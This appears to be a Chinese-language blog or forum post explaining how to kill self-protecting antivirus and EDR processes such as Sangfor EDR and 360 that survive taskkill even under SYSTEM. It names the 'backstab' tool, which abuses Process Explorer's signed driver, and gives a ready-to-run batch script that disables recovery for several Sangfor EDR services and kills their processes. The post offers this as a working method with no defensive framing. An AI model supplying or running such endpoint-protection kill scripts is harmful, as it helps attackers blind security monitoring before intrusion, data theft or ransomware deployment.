如何杀死那些杀不死的进程?
有一些rootkit软件,包括一些防病毒软件,例如深信服EDR,360等杀毒软件,都是带自我保护的,就算你有了管理员权限,也是无法杀死他们的进程的,哪怕使用system账户,也无法通过 taskkill, process explorer 等工具杀死这些进程。
要杀死这些带自我保护的进程,用backstab就可以杀死,具体原理是:
利用Process Explorer自带的微软签名的底层驱动程序,以SYSTEM账户运行驱动服务,然后通过驱动服务来获取DEBUG权限,然后再杀掉进程。
例如,要杀死 Sangfor EDR,可以用下面的批处理:
@echo off
sc failure edr_monitor actions=none reset=0
sc failure savsvc actions=none reset=0
sc failure eaio_service actions=none reset=0
sc failure abs_deployer actions=none reset=0
sc failure sxfhost actions=none reset=0
backstab -n edr_monitor.exe -k
backstab -n sfavsvc.exe -k
backstab -n sfavtray.exe -k
backstab -n sxfhost.exe -k
backstab -n abs_deployer.exe -k
rem backstab -n sfavroguedf.exe -k